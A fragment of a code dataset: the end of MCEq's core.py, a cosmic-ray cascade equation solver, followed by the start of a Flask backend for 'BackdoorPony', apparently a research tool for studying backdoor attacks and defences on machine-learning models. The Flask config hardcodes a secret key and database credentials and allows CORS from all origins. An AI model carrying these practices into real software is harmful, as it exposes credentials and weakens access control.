1\n\n # Equalize the first three moments for 3 normalizations around the central\n # bin\n emat = np.vstack(\n (ewidths[cenbin - 1:cenbin + 2],\n ewidths[cenbin - 1:cenbin + 2] * egrid[cenbin - 1:cenbin + 2],\n ewidths[cenbin - 1:cenbin + 2] * egrid[cenbin - 1:cenbin + 2]**2))\n\n if n_nucleons == 0:\n # This case handles other exotic projectiles\n b_particle = np.array([1., En, En**2])\n lidx = self.pman[pdg_id].lidx\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self._phi0[lidx + cenbin - 1:lidx + cenbin + 2] += solve(\n emat, b_particle)\n return\n\n if n_protons > 0:\n b_protons = np.array(\n [n_protons, En * n_protons, En**2 * n_protons])\n p_lidx = self.pman[2212].lidx\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self._phi0[p_lidx + cenbin - 1:p_lidx + cenbin + 2] += solve(\n emat, b_protons)\n if n_neutrons > 0:\n b_neutrons = np.array(\n [n_neutrons, En * n_neutrons, En**2 * n_neutrons])\n n_lidx = self.pman[2112].lidx\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self._phi0[n_lidx + cenbin - 1:n_lidx + cenbin + 2] += solve(\n emat, b_neutrons)\n\n def set_initial_spectrum(self, spectrum, pdg_id=None, append=False):\n \"\"\"Set a user-defined spectrum for an arbitrary species as initial condition. \n\n This function is equivalent to :func:`set_single_primary_particle`. It\n allows defining an arbitrary spectrum for each available particle species\n as initial condition for the integration. 
Set the `append` argument to `True`\n for subsequent species to define initial spectra combined from different particles.\n\n The (differential) spectrum has to be distributed on the energy grid as dN/dptot, i.e.\n divided by the bin widths and with the total momentum units in GeV(/c).\n\n Args:\n spectrum (np.array): spectrum dN/dptot\n pdg_id (int): PDG ID in case of a particle \n \"\"\"\n\n from MCEq.misc import getAZN_corsika, getAZN\n\n info(2, 'PDG ID {0}'.format(pdg_id))\n\n if not append:\n self._restore_initial_condition = [(self.set_initial_spectrum,\n pdg_id, append)]\n self._phi0 *= 0\n else:\n self._restore_initial_condition.append((self.set_initial_spectrum,\n pdg_id, append))\n egrid = self._energy_grid.c\n ebins = self._energy_grid.b\n ewidths = self._energy_grid.w\n\n if len(spectrum) != self.dim:\n raise Exception(\n 'Lengths of spectrum and energy grid do not match.')\n\n self._phi0[self.pman[pdg_id].lidx:self.pman[pdg_id].uidx] += spectrum\n\n def set_density_model(self, density_config):\n \"\"\"Sets model of the atmosphere.\n\n To choose, for example, a CORSIKA parametrization for the Southpole in January,\n do the following::\n\n mceq_instance.set_density_model(('CORSIKA', ('PL_SouthPole', 'January')))\n\n More details about the choices can be found in :mod:`MCEq.geometry.density_profiles`. Calling\n this method will issue a recalculation of the interpolation and the integration path.\n\n From version 1.2 and above, the `density_config` parameter can be a reference to\n an instance of a density class directly. The class has to be derived either from\n :class:`MCEq.geometry.density_profiles.EarthsAtmosphere` or\n :class:`MCEq.geometry.density_profiles.GeneralizedTarget`.\n\n Args:\n density_config (tuple of strings): (parametrization type, arguments)\n \"\"\"\n import MCEq.geometry.density_profiles as dprof\n \n # Check if string arguments or an instance of the density class is provided \n if not isinstance(density_config, (dprof.EarthsAtmosphere, dprof.GeneralizedTarget)):\n \n base_model, model_config = density_config\n\n available_models = [\n 'MSIS00', 'MSIS00_IC', 'CORSIKA', 'AIRS', 'Isothermal',\n 'GeneralizedTarget'\n ]\n\n if base_model not in available_models:\n info(0, 'Unknown density model. 
Available choices are:\\n',\n '\\n'.join(available_models))\n raise Exception('Choose a different profile.')\n\n info(1, 'Setting density profile to', base_model, model_config)\n\n if base_model == 'MSIS00':\n self.density_model = dprof.MSIS00Atmosphere(*model_config)\n elif base_model == 'MSIS00_IC':\n self.density_model = dprof.MSIS00IceCubeCentered(*model_config)\n elif base_model == 'CORSIKA':\n self.density_model = dprof.CorsikaAtmosphere(*model_config)\n elif base_model == 'AIRS':\n self.density_model = dprof.AIRSAtmosphere(*model_config)\n elif base_model == 'Isothermal':\n self.density_model = dprof.IsothermalAtmosphere(*model_config)\n elif base_model == 'GeneralizedTarget':\n self.density_model = dprof.GeneralizedTarget()\n else:\n raise Exception('Unknown atmospheric base model.')\n self.density_config = density_config \n\n else:\n self.density_model = density_config\n self.density_config = density_config\n\n if self.theta_deg is not None and isinstance(self.density_model, dprof.EarthsAtmosphere):\n self.set_theta_deg(self.theta_deg)\n elif isinstance(self.density_model, dprof.GeneralizedTarget):\n self.integration_path = None\n else:\n raise Exception('Density model not supported.')\n\n # TODO: Make the pman aware of that density might have changed and\n # indices as well\n # self.pmod._gen_list_of_particles()\n\n def set_theta_deg(self, theta_deg):\n \"\"\"Sets zenith angle :math:`\\theta` as seen from a detector.\n\n Currently only 'down-going' angles (0-90 degrees) are supported.\n\n Args:\n theta_deg (float): zenith angle in the range 0-90 degrees\n \"\"\"\n import MCEq.geometry.density_profiles as dprof\n \n info(2, 'Zenith angle {0:6.2f}'.format(theta_deg))\n\n if isinstance(self.density_model, dprof.GeneralizedTarget):\n raise Exception('GeneralizedTarget does not support angles.')\n\n if self.density_model.theta_deg == theta_deg:\n info(2,\n 'Theta selection corresponds to cached value, skipping calc.')\n return\n\n self.density_model.set_theta(theta_deg)\n self.integration_path = None\n\n\n def set_mod_pprod(self,\n prim_pdg,\n sec_pdg,\n x_func,\n x_func_args,\n delay_init=False):\n \"\"\"Sets combination of projectile/secondary for error propagation.\n\n The production spectrum of ``sec_pdg`` in interactions of\n ``prim_pdg`` is modified according to the function passed to\n :func:`InteractionYields.init_mod_matrix`\n\n Args:\n prim_pdg (int): interacting (primary) particle PDG ID\n sec_pdg (int): secondary particle PDG ID\n x_func (object): reference to function\n x_func_args (tuple): arguments passed to ``x_func``\n delay_init (bool): Prevent init of mceq matrices if you are\n planning to add more modifications\n \"\"\"\n info(\n 1, '{0}/{1}, {2}, {3}'.format(prim_pdg, sec_pdg, x_func.__name__,\n str(x_func_args)))\n\n init = self._interactions._set_mod_pprod(prim_pdg, sec_pdg, x_func,\n x_func_args)\n\n # Need to regenerate matrices completely\n return int(init)\n\n def unset_mod_pprod(self, dont_fill=False):\n \"\"\"Removes modifications from :func:`MCEqRun.set_mod_pprod`.\n\n Args:\n dont_fill (bool): If `True` do not regenerate matrices\n (has to be done at a later step by hand)\n \"\"\"\n from collections import defaultdict\n info(1, 'Particle production modifications reset to defaults.')\n\n self._interactions.mod_pprod = defaultdict(lambda: {})\n # Need to regenerate matrices completely\n if not dont_fill:\n self.regenerate_matrices()\n\n def regenerate_matrices(self, skip_decay_matrix=False):\n \"\"\"Call this function after applying particle prod. 
modifications, a.k.a.\n Barr parameters.\"\"\"\n\n # TODO: Not all particles need to be reset and there is some performance loss\n # This can be optimized by refreshing only the particles that change or through\n # lazy evaluation, i.e. hadronic channels dict. calls data.int..get_matrix on demand\n self.pman.set_interaction_model(self._int_cs,\n self._interactions,\n force=True)\n self.int_m, self.dec_m = self.matrix_builder.construct_matrices(\n skip_decay_matrix=skip_decay_matrix)\n\n def solve(self, int_grid=None, grid_var='X', **kwargs):\n \"\"\"Launches the solver.\n\n The setting `integrator` in the config file decides which solver\n to launch.\n\n Args:\n int_grid (list): list of depths at which results are recorded\n grid_var (str): Can be depth `X` or something else (currently only `X` supported)\n kwargs (dict): Arguments are passed directly to the solver methods.\n\n \"\"\"\n info(2, \"Launching {0} solver\".format(config.integrator))\n\n if not kwargs.pop('skip_integration_path', False):\n if int_grid is not None and np.any(np.diff(int_grid) < 0):\n raise Exception('The X values in int_grid are required to be strictly increasing.')\n\n # Calculate integration path if not yet happened\n self._calculate_integration_path(int_grid, grid_var)\n else:\n info(2, 'Warning: integration path calculation skipped.')\n\n phi0 = np.copy(self._phi0)\n nsteps, dX, rho_inv, grid_idcs = self.integration_path\n\n info(2, 'for {0} integration steps.'.format(nsteps))\n\n import MCEq.solvers\n\n start = time()\n\n if config.kernel_config.lower() == 'numpy':\n kernel = MCEq.solvers.solv_numpy\n args = (nsteps, dX, rho_inv, self.int_m, self.dec_m, phi0,\n grid_idcs)\n\n elif (config.kernel_config.lower() == 'cuda'):\n kernel = MCEq.solvers.solv_CUDA_sparse\n try:\n self.cuda_context.set_matrices(self.int_m, self.dec_m)\n except AttributeError:\n from MCEq.solvers import CUDASparseContext\n self.cuda_context = CUDASparseContext(\n self.int_m, self.dec_m, device_id=self._cuda_device)\n args = (nsteps, dX, rho_inv, self.cuda_context, phi0, grid_idcs)\n\n elif (config.kernel_config.lower() == 'mkl'):\n kernel = MCEq.solvers.solv_MKL_sparse\n args = (nsteps, dX, rho_inv, self.int_m, self.dec_m, phi0,\n grid_idcs)\n\n else:\n raise Exception(\n \"Unsupported integrator setting '{0}'.\".format(\n config.kernel_config))\n\n self._solution, self.grid_sol = kernel(*args)\n\n info(\n 2, 'time elapsed during integration: {0:5.2f}sec'.format(time() -\n start))\n\n def _calculate_integration_path(self, int_grid, grid_var, force=False):\n\n if (self.integration_path and np.alltrue(int_grid == self.int_grid)\n and np.alltrue(self.grid_var == grid_var) and not force):\n info(5, 'skipping calculation.')\n return\n\n self.int_grid, self.grid_var = int_grid, grid_var\n if grid_var != 'X':\n raise NotImplementedError(\n 'Grid variables other than the depth X are not yet supported.'\n )\n\n max_X = self.density_model.max_X\n ri = self.density_model.r_X2rho\n max_lint = self.matrix_builder.max_lint\n max_ldec = self.matrix_builder.max_ldec\n info(2, 'X_surface = {0:7.2f}g/cm2'.format(max_X))\n\n dX_vec = []\n rho_inv_vec = []\n\n X = 0.0\n step = 0\n grid_step = 0\n grid_idcs = []\n # The 'True or' short-circuit makes this branch always taken.\n if True or (max_ldec / self.density_model.max_den > max_lint\n and config.leading_process == 'decays'):\n info(3, \"using decays as leading eigenvalues\")\n def delta_X(X): \n return config.stability_margin / (max_ldec * ri(X))\n elif config.leading_process == 'interactions':\n info(2, \"using interactions as leading eigenvalues\")\n 
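# Interaction lengths do not depend on the local density, so this\n # branch uses a constant step size (contrast the decay branch above).\n 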
def delta_X(X): \n return config.stability_margin / max_lint\n else: \n def delta_X(X):\n dX = min(\n config.stability_margin / (max_ldec * ri(X)),\n config.stability_margin / max_lint)\n # if dX/self.density_model.max_X < 1e-7:\n # raise Exception(\n # 'Stiffness warning: dX <= 1e-7. Check configuration or' +\n # 'manually call MCEqRun._calculate_integration_path(int_grid, \"X\", force=True).')\n return dX\n \n\n dXmax = config.dXmax\n while X < max_X:\n dX = min(delta_X(X), dXmax)\n if (np.any(int_grid) and (grid_step < len(int_grid))\n and (X + dX >= int_grid[grid_step])):\n dX = int_grid[grid_step] - X\n grid_idcs.append(step)\n grid_step += 1\n dX_vec.append(dX)\n rho_inv_vec.append(ri(X))\n X = X + dX\n step += 1\n\n # Integrate\n dX_vec = np.array(dX_vec)\n rho_inv_vec = np.array(rho_inv_vec)\n\n self.integration_path = len(dX_vec), dX_vec, rho_inv_vec, grid_idcs\n\n def n_particles(self, label, grid_idx=None, min_energy_cutoff=1e-1):\n \"\"\"Returns number of particles of type `label` at a grid step above\n an energy threshold for counting.\n \n Args:\n label (str): Particle name\n grid_idx (int): Depth grid index (for profiles)\n min_energy_cutoff (float): Energy threshold > mceq_config.e_min\n \"\"\"\n ie_min = np.argmin(\n np.abs(self.e_bins -\n self.e_bins[self.e_bins >= min_energy_cutoff][0]))\n info(\n 10,\n 'Energy cutoff for particle number calculation {0:4.3e} GeV'.format(\n self.e_bins[ie_min]))\n info(\n 15,\n 'First bin is between {0:3.2e} and {1:3.2e} with midpoint {2:3.2e}'\n .format(self.e_bins[ie_min], self.e_bins[ie_min + 1],\n self.e_grid[ie_min]))\n return np.sum(\n self.get_solution(label, mag=0, integrate=True, grid_idx=grid_idx)[ie_min:])\n\n def n_mu(self, grid_idx=None, min_energy_cutoff=1e-1):\n \"\"\"Returns the number of positive and negative muons at a grid step above\n `min_energy_cutoff`.\n \n Args:\n grid_idx (int): Depth grid index (for profiles)\n min_energy_cutoff (float): Energy threshold > mceq_config.e_min\n \n \"\"\"\n return (self.n_particles('total_mu+', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff) +\n self.n_particles('total_mu-', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff))\n\n def n_e(self, grid_idx=None, min_energy_cutoff=1e-1):\n \"\"\"Returns the number of electrons plus positrons at a grid step above\n `min_energy_cutoff`.\n \n Args:\n grid_idx (int): Depth grid index (for profiles)\n min_energy_cutoff (float): Energy threshold > mceq_config.e_min\n \"\"\"\n return (self.n_particles('e+', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff) +\n self.n_particles('e-', grid_idx=grid_idx, min_energy_cutoff=min_energy_cutoff))\n\n def z_factor(self, projectile_pdg, secondary_pdg, definition='primary_e'):\n \"\"\"Energy dependent Z-factor according to Thunman et al. 
(1996).\"\"\"\n\n proj = self.pman[projectile_pdg]\n sec = self.pman[secondary_pdg]\n\n if not proj.is_projectile:\n raise Exception('{0} is not a projectile particle.'.format(\n proj.name))\n info(\n 10, 'Computing e-dependent Zfactor for {0} -> {1}'.format(\n proj.name, sec.name))\n if not proj.is_secondary(sec):\n raise Exception('{0} is not a secondary particle of {1}.'.format(\n sec.name, proj.name))\n\n if proj == 2112:\n nuc_flux = self.pmodel.p_and_n_flux(self.e_grid)[2]\n else:\n nuc_flux = self.pmodel.p_and_n_flux(self.e_grid)[1]\n\n smat = proj.hadr_yields[sec]\n proj_cs = proj.inel_cross_section()\n zfac = np.zeros_like(self.e_grid)\n\n # Definition wrt CR energy (different from Thunman) on x-axis\n if definition == 'primary_e':\n min_energy = 2.\n for p_eidx, e in enumerate(self.e_grid):\n if e < min_energy:\n min_idx = p_eidx + 1\n continue\n zfac[p_eidx] = np.sum(\n smat[min_idx:p_eidx + 1, p_eidx] * nuc_flux[p_eidx] /\n nuc_flux[min_idx:p_eidx + 1] * proj_cs[p_eidx] /\n proj_cs[min_idx:p_eidx + 1])\n return zfac\n else:\n # Like in Thunman et al. 1996\n for p_eidx, _ in enumerate(self.e_grid):\n zfac[p_eidx] = np.sum(smat[p_eidx, p_eidx:] *\n nuc_flux[p_eidx:] / nuc_flux[p_eidx] *\n proj_cs[p_eidx:] / proj_cs[p_eidx])\n return zfac\n\n def decay_z_factor(self, parent_pdg, child_pdg):\n \"\"\"Energy-dependent Z-factor according to Lipari (1993).\"\"\"\n\n proj = self.pman[parent_pdg]\n sec = self.pman[child_pdg]\n\n if proj.is_stable:\n raise Exception('{0} does not decay.'.format(proj.name))\n info(\n 10, 'Computing e-dependent decay Zfactor for {0} -> {1}'.format(\n proj.name, sec.name))\n if not proj.is_child(sec):\n raise Exception('{0} is not a child particle of {1}.'.format(\n sec.name, proj.name))\n\n cr_gamma = self.pmodel.nucleon_gamma(self.e_grid)\n zfac = np.zeros_like(self.e_grid)\n for p_eidx, e in enumerate(self.e_grid):\n # if e < min_energy:\n # min_idx = p_eidx + 1\n # continue\n xlab, xdist = proj.dNdec_dxlab(e, sec)\n zfac[p_eidx] = np.trapz(xlab**(-cr_gamma[p_eidx] - 2.) * xdist,\n x=xlab)\n return zfac\n\n\nclass MatrixBuilder(object):\n \"\"\"This class constructs the interaction and decay matrices.\"\"\"\n\n def __init__(self, particle_manager):\n self._pman = particle_manager\n self._energy_grid = self._pman._energy_grid\n self.int_m = None\n self.dec_m = None\n\n self._construct_differential_operator()\n\n def construct_matrices(self, skip_decay_matrix=False):\n r\"\"\"Constructs the matrices for calculation.\n\n These are:\n\n - :math:`\boldsymbol{M}_{int} = (-\boldsymbol{1} + \boldsymbol{C}){\boldsymbol{\Lambda}}_{int}`,\n - :math:`\boldsymbol{M}_{dec} = (-\boldsymbol{1} + \boldsymbol{D}){\boldsymbol{\Lambda}}_{dec}`.\n\n For debug_levels >= 2 some general information about matrix shape and the number of\n non-zero elements is printed. The intermediate matrices :math:`\boldsymbol{C}` and\n :math:`\boldsymbol{D}` are deleted afterwards to save memory.\n\n Set the ``skip_decay_matrix`` flag to avoid recreating the decay matrix. This is not necessary\n if, for example, particle production is modified, or the interaction model is changed.\n\n Args:\n skip_decay_matrix (bool): Omit re-creating D matrix\n\n \"\"\"\n\n from itertools import product\n info(\n 3, \"Start filling matrices. 
Skip_decay_matrix = {0}\".format(\n skip_decay_matrix))\n\n self._fill_matrices(skip_decay_matrix=skip_decay_matrix)\n\n cparts = self._pman.cascade_particles\n\n # interaction part\n # -I + C\n # In first interaction mode it is just C\n self.max_lint = 0.\n\n for parent, child in product(cparts, cparts):\n idx = (child.mceqidx, parent.mceqidx)\n # Main diagonal\n if child.mceqidx == parent.mceqidx and parent.can_interact:\n # Subtract unity from the main diagonals\n info(10, 'subtracting main C diagonal from', child.name,\n parent.name)\n self.C_blocks[idx][np.diag_indices(self.dim)] -= 1.\n\n if idx in self.C_blocks:\n # Multiply with Lambda_int and keep track of the maximal\n # interaction length for the calculation of integration steps\n self.max_lint = np.max([\n self.max_lint,\n np.max(parent.inverse_interaction_length())\n ])\n self.C_blocks[idx] *= parent.inverse_interaction_length()\n\n if child.mceqidx == parent.mceqidx and parent.has_contloss:\n if config.enable_muon_energy_loss and abs(\n parent.pdg_id[0]) == 13:\n info(5, 'Cont. loss for', parent.name)\n self.C_blocks[idx] += self.cont_loss_operator(\n parent.pdg_id)\n if config.enable_em_ion and abs(parent.pdg_id[0]) == 11:\n info(5, 'Cont. loss for', parent.name)\n self.C_blocks[idx] += self.cont_loss_operator(\n parent.pdg_id)\n\n self.int_m = self._csr_from_blocks(self.C_blocks)\n # -I + D\n\n if not skip_decay_matrix or self.dec_m is None:\n self.max_ldec = 0.\n for parent, child in product(cparts, cparts):\n idx = (child.mceqidx, parent.mceqidx)\n # Main diagonal\n if child.mceqidx == parent.mceqidx and not parent.is_stable:\n # Subtract unity from the main diagonals\n info(10, 'subtracting main D diagonal from', child.name,\n parent.name)\n self.D_blocks[idx][np.diag_indices(self.dim)] -= 1.\n if idx not in self.D_blocks:\n info(25, parent.pdg_id[0], child.pdg_id, 'not in D_blocks')\n continue\n # Multiply with Lambda_dec and keep track of the\n # maximal decay length for the calculation of integration steps\n self.max_ldec = max(\n [self.max_ldec,\n np.max(parent.inverse_decay_length())])\n self.D_blocks[idx] *= parent.inverse_decay_length()\n\n self.dec_m = self._csr_from_blocks(self.D_blocks)\n\n for mname, mat in [('C', self.int_m), ('D', self.dec_m)]:\n mat_density = (float(mat.nnz) / float(np.prod(mat.shape)))\n info(5, \"{0} Matrix info:\".format(mname))\n info(5, \" density : {0:3.2%}\".format(mat_density))\n info(5, \" shape : {0} x {1}\".format(*mat.shape))\n info(5, \" nnz : {0}\".format(mat.nnz))\n info(10, \" sum :\", mat.sum())\n\n info(3, \"Done filling matrices.\")\n\n return self.int_m, self.dec_m\n\n def _average_operator(self, op_mat):\n \"\"\"Averages the continuous loss operator by performing\n 1/max_step explicit Euler steps\"\"\"\n\n n_steps = int(1. 
/ config.loss_step_for_average)\n info(\n 10,\n 'Averaging continuous loss using {0} intermediate steps.'.format(\n n_steps))\n\n op_step = np.eye(\n self._energy_grid.d) + op_mat * config.loss_step_for_average\n return np.linalg.matrix_power(op_step, n_steps) - np.eye(\n self._energy_grid.d)\n\n def cont_loss_operator(self, pdg_id):\n \"\"\"Returns the continuous loss operator that can be added at the\n appropriate position in the C matrix.\"\"\"\n op_mat = -np.diag(1 / self._energy_grid.c).dot(\n self.op_matrix.dot(np.diag(self._pman[pdg_id].dEdX)))\n\n if config.average_loss_operator:\n return self._average_operator(op_mat)\n else:\n return op_mat\n\n @property\n def dim(self):\n \"\"\"Energy grid (dimension)\"\"\"\n return self._pman.dim\n\n @property\n def dim_states(self):\n \"\"\"Number of cascade particles times dimension of grid\n (dimension of the equation system)\"\"\"\n return self._pman.dim_states\n\n def _zero_mat(self):\n \"\"\"Returns a new square zero valued matrix with dimensions of grid.\n \"\"\"\n return np.zeros((self._pman.dim, self._pman.dim))\n\n def _csr_from_blocks(self, blocks):\n \"\"\"Construct a csr matrix from a dictionary of submatrices (blocks)\n\n Note::\n\n It is difficult to construct a properly indexed sparse matrix\n directly from the blocks, since ``scipy.sparse.bmat`` does not\n preserve the intended ordering.\n \"\"\"\n from scipy.sparse import csr_matrix\n\n new_mat = np.zeros((self.dim_states, self.dim_states))\n for (c, p), d in six.iteritems(blocks):\n rc, rp = self._pman.mceqidx2pref[c], self._pman.mceqidx2pref[p]\n try:\n new_mat[rc.lidx:rc.uidx, rp.lidx:rp.uidx] = d\n except ValueError:\n raise Exception(\n 'Dimension mismatch: matrix {0}x{1}, p={2}:({3},{4}), c={5}:({6},{7})'\n .format(self.dim_states, self.dim_states, rp.name, rp.lidx,\n rp.uidx, rc.name, rc.lidx, rc.uidx))\n return csr_matrix(new_mat)\n\n def _follow_chains(self, p, pprod_mat, p_orig, idcs, propmat, reclev=0):\n \"\"\"Recursively follows the decay chains of particle ``p`` and\n accumulates the resulting propagation matrices in ``propmat``.\n \"\"\"\n info(40, reclev * '\\t', 'entering with', p.name)\n # print 'orig, p', p_orig.pdg_id, p.pdg_id\n for d in p.children:\n info(40, reclev * '\\t', 'following to', d.name)\n if not d.is_resonance:\n # print 'adding stuff', p_orig.pdg_id, p.pdg_id, d.pdg_id\n dprop = self._zero_mat()\n p._assign_decay_idx(d, idcs, d.hadridx, dprop)\n propmat[(d.mceqidx, p_orig.mceqidx)] += dprop.dot(pprod_mat)\n\n if config.debug_level >= 20:\n pstr = 'res'\n dstr = 'Mchain'\n if idcs == p.hadridx:\n pstr = 'prop'\n dstr = 'Mprop'\n info(\n 40, reclev * '\\t',\n 'setting {0}[({1},{3})->({2},{4})]'.format(\n dstr, p_orig.name, d.name, pstr, 'prop'))\n\n if d.is_mixed or d.is_resonance:\n dres = self._zero_mat()\n p._assign_decay_idx(d, idcs, d.residx, dres)\n reclev += 1\n self._follow_chains(d, dres.dot(pprod_mat), p_orig, d.residx,\n propmat, reclev)\n else:\n info(20, reclev * '\\t', '\\t terminating at', d.name)\n\n def _fill_matrices(self, skip_decay_matrix=False):\n \"\"\"Generates the interaction and decay matrices from scratch.\n \"\"\"\n from collections import defaultdict\n\n # Fill decay matrix blocks\n if not skip_decay_matrix or self.dec_m is None:\n # Initialize empty D matrix\n self.D_blocks = defaultdict(lambda: self._zero_mat())\n for p in self._pman.cascade_particles:\n # Fill parts of the D matrix related to p as mother\n if not p.is_stable and bool(p.children) and not p.is_tracking:\n self._follow_chains(p,\n np.diag(np.ones((self.dim))),\n p,\n p.hadridx,\n self.D_blocks,\n reclev=0)\n else:\n info(20, p.name, 'stable or not added to D matrix')\n\n # 
Initialize empty C blocks\n self.C_blocks = defaultdict(lambda: self._zero_mat())\n for p in self._pman.cascade_particles:\n # if p doesn't interact, skip interaction matrices\n if not p.is_projectile:\n if p.is_hadron:\n info(\n 1, 'No interactions by {0} ({1}).'.format(\n p.name, p.pdg_id))\n continue\n for s in p.hadr_secondaries:\n # if s not in self.pman.cascade_particles:\n # print 'Doing nothing with', p.pdg_id, s.pdg_id\n # continue\n\n if not s.is_resonance:\n cmat = self._zero_mat()\n p._assign_hadr_dist_idx(s, p.hadridx, s.hadridx, cmat)\n self.C_blocks[(s.mceqidx, p.mceqidx)] += cmat\n\n cmat = self._zero_mat()\n p._assign_hadr_dist_idx(s, p.hadridx, s.residx, cmat)\n self._follow_chains(s,\n cmat,\n p,\n s.residx,\n self.C_blocks,\n reclev=1)\n\n def _construct_differential_operator(self):\n \"\"\"Constructs a derivative operator for the continuous losses.\n\n This implementation uses a 6th-order finite-differences operator and\n depends only on the energy grid. This is an operator for a sub-matrix\n of dimension (energy grid, energy grid) for a single particle. It\n can likewise be applied to all particle species. The dEdX values are\n applied later in ...\n \"\"\"\n # First rows of operator matrix (values are truncated at the edges\n # of a matrix.)\n diags_leftmost = [0, 1, 2, 3]\n coeffs_leftmost = [-11, 18, -9, 2]\n denom_leftmost = 6\n diags_left_1 = [-1, 0, 1, 2, 3]\n coeffs_left_1 = [-3, -10, 18, -6, 1]\n denom_left_1 = 12\n diags_left_2 = [-2, -1, 0, 1, 2, 3]\n coeffs_left_2 = [3, -30, -20, 60, -15, 2]\n denom_left_2 = 60\n\n # Centered diagonals\n # diags = [-3, -2, -1, 1, 2, 3]\n # coeffs = [-1, 9, -45, 45, -9, 1]\n # denom = 60.\n diags = diags_left_2\n coeffs = coeffs_left_2\n denom = 60.\n\n # Last rows at the right of operator matrix\n diags_right_2 = [-d for d in diags_left_2[::-1]]\n coeffs_right_2 = [-d for d in coeffs_left_2[::-1]]\n denom_right_2 = denom_left_2\n diags_right_1 = [-d for d in diags_left_1[::-1]]\n coeffs_right_1 = [-d for d in coeffs_left_1[::-1]]\n denom_right_1 = denom_left_1\n diags_rightmost = [-d for d in diags_leftmost[::-1]]\n coeffs_rightmost = [-d for d in coeffs_leftmost[::-1]]\n denom_rightmost = denom_leftmost\n\n h = np.log(self._energy_grid.b[1:] / self._energy_grid.b[:-1])\n dim_e = self._energy_grid.d\n last = dim_e - 1\n\n op_matrix = np.zeros((dim_e, dim_e))\n op_matrix[0, np.asarray(diags_leftmost)] = np.asarray(\n coeffs_leftmost) / (denom_leftmost * h[0])\n op_matrix[1, 1 +\n np.asarray(diags_left_1)] = np.asarray(coeffs_left_1) / (\n denom_left_1 * h[1])\n op_matrix[2, 2 +\n np.asarray(diags_left_2)] = np.asarray(coeffs_left_2) / (\n denom_left_2 * h[2])\n op_matrix[last, last + np.asarray(diags_rightmost)] = np.asarray(\n coeffs_rightmost) / (denom_rightmost * h[last])\n op_matrix[last - 1, last - 1 +\n np.asarray(diags_right_1)] = np.asarray(coeffs_right_1) / (\n denom_right_1 * h[last - 1])\n op_matrix[last - 2, last - 2 +\n np.asarray(diags_right_2)] = np.asarray(coeffs_right_2) / (\n denom_right_2 * h[last - 2])\n for row in range(3, dim_e - 3):\n op_matrix[row, row +\n np.asarray(diags)] = np.asarray(coeffs) / (denom *\n h[row])\n\n self.op_matrix = op_matrix\n","repo_name":"mceq-project/MCEq","sub_path":"MCEq/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":54114,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"3915928739","text":"# These are the packages we are inspecting\nimport copy\nimport json\n\n\nimport backdoorpony.attacks\nimport 
backdoorpony.defences\nimport backdoorpony.metrics\nfrom backdoorpony.app_tracker import AppTracker\nfrom backdoorpony.dynamic_imports import import_submodules_attributes\nfrom flask import Flask, jsonify, request\n# Instantiate the app\nfrom flask_cors import CORS, cross_origin\n\n# temporary map\ndataset_to_model = {\n \"IMDB\": \"IMDB_LSTM_RNN\",\n \"MNIST\": \"MNIST_CNN\",\n \"CIFAR10\": \"CifarCNN\",\n \"Fashion_MNIST\": \"FMNIST_CNN\",\n \"Audio_MNIST\": \"Audio_MNIST_RNN\",\n \"AIDS\": \"AIDS_sage\",\n \"Mutagenicity\": \"Mutagenicity_sage\",\n \"IMDB MULTI\": \"IMDB_MULTI_sage\",\n \"Yeast\": \"Yeast_sage\",\n \"Synthie\": \"Synthie_sage\",\n \"Audio_VGD\": \"Audio_VGD_CNN\",\n \"AMAZON\": \"AMAZON_CNN\"\n}\n\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config['SECRET_KEY'] = 'df0a17bc371e1b72883f3df3cc0928dd'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://pony:backdoor@mariadb:3306/bpdb'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Enable CORS\n\nCORS(app, resources={r'/*': {'origins': '*'}})\n\napp_tracker = AppTracker()\n\n@app.route('/home')\ndef home():\n '''Returns welcome string.'''\n jsonString = 'Welcome to BackdoorPony!'\n return jsonString\n\n\n# Models & Classifiers -------------------------------------------------\n\n@app.route('/get_datasets', methods=['GET'])\ndef get_datasets():\n '''Provides all available datasets\n\n Should return the following:\n {\n 'image': [\n 'MNIST',\n 'CIFAR10'\n ],\n 'text': [\n 'IMDB'\n ],\n 'audio': [...],\n 'graph': [...]\n }\n '''\n return jsonify(app_tracker.model_loader.get_datasets())\n\n\n@app.route('/select_model', methods=['POST'])\n@cross_origin()\ndef select_model():\n '''Select which model is used to create the classifier.\n Can be either a built-in one or have a file with the model attached which is then used.\n\n\n Should receive the following, where values between <> can vary:\n form:\n {\n 'type': '',\n 'dataset': '',\n }\n file (optional):\n {\n 'model': <.pth file>\n }\n '''\n model_params = json.loads(request.form['modelParams'].replace(\"'\", '\"'))\n app_tracker.model_params = model_params\n app_tracker.dataset = request.form['dataset']\n model = None\n if 'model' in request.files:\n model = request.files['model']\n app_tracker.file_name = model.filename\n app_tracker.model_loader.make_classifier(request.form['type'],\n request.form['dataset'],\n model_params,\n model)\n\n return jsonify('Creating/choosing the classifier was successful.')\n\n\n# Attacks & Defences ---------------------------------------------------\n@app.route('/get_all_models', methods=['GET'])\ndef get_all_models():\n '''Returns a list of all the attacks and their info in JSON format.'''\n _, models = import_submodules_attributes(package=backdoorpony.models, result=[\n ], recursive=True, req_module=None, req_attr=['__name__', '__category__','__input_type__', '__info__', '__link__'])\n return jsonify(models)\n\n@app.route('/get_all_attacks', methods=['GET'])\ndef get_all_attacks():\n '''Returns a list of all the attacks and their info in JSON format.'''\n _, attacks = import_submodules_attributes(package=backdoorpony.attacks, result=[\n ], recursive=True, req_module=None, req_attr=['__name__', '__category__','__input_type__', '__info__', '__link__'])\n return jsonify(attacks)\n\n\n@app.route('/get_all_defences', methods=['GET'])\ndef get_all_defences():\n '''Returns a list of all the defences and their info in JSON format.'''\n _, defences = import_submodules_attributes(package=backdoorpony.defences, 
